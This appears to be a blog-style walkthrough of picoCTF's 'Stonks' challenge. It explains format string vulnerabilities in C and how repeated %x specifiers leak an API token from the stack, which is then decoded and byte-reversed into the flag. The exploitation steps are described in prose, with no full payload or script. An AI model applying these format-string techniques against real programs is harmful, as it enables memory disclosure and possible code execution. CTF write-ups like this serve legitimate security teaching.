Format string vulnerability occurs when the submitted data of an input string is evaluated as a command by the application.In this way, the attacker could execute code,read the stack, or cause a segmentation fault in the running application, causing new behaviors that could compromise the security or the stability of the system.Vulnerabilities occur when user-supplied data are used directly as formatting string input for certain C/C++ functions (e.g. fprintf, printf, sprintf, setproctitle, syslog, etc).This could lead to various threats for an organization according to the merit of an attacker/hacker.So let's go through a real life scenario of this vulnerability. For demonstration i'm using PicoCTF's stokns challenge which would be perfect .
STONKS
Description
I decided to try something noone else has before. I made a bot to automatically trade stonks for me using AI and machine learning. I wouldn't believe you if you told me it's unsecure! vuln.c nc mercury.picoctf.net 20195
In this challenge Firstly we get a file vuln.c and a netcat command to connect to the challenge. first let's connect to the netcat and see what we get ......
Ok here we can see it's a trading app and we can buy stonks. let's go through the vuln.c we got from the challenge.
In the last part of the code we can see this code is taking input and asking for API token and validate the answer with "%300s" as a string format accordingly. But in the second input where it asking for Buying stonks with the token the user_buf is not validated by any string format . So here we can say it's vulnerable to format string. because we can enter any format parameters to read data from stack.Below are some format parameters which can be used and their consequences:
•”%x” Read data from the stack
•”%s” Read character strings from the process’ memory
•”%n” Write an integer to locations in the process’ memory
so let's try with the ''%x" first. When i tried with two format string i get some of the data from the stack. now we are 100% sure we can get the token from this vulnerability.For this we need to use this format as much as we can.
Gotcha! we found the token. But it's in hex format so we need convert this in ASCII to find the flag.You can use however method you like to do this. here simply i'm using an online converter.
Here we can see a flag format but somehow it's not right. Can you guess it? yes, the flag is inverted. To revert this there are thousands of methods. But i will mention some.
1) You can take the flag to it's current format and convert it to hex. Swap this hex little indian to big indian format. lastly convert it again to hex and you will get the flag.
2) You can manually revert this. Just copy the flag in it's current format and write down all the characters in reverse. You will get the flag.
3) Lastly my favorite, you can use python to solve this. you just need to write some piece of code.and here we can see we got the flag.
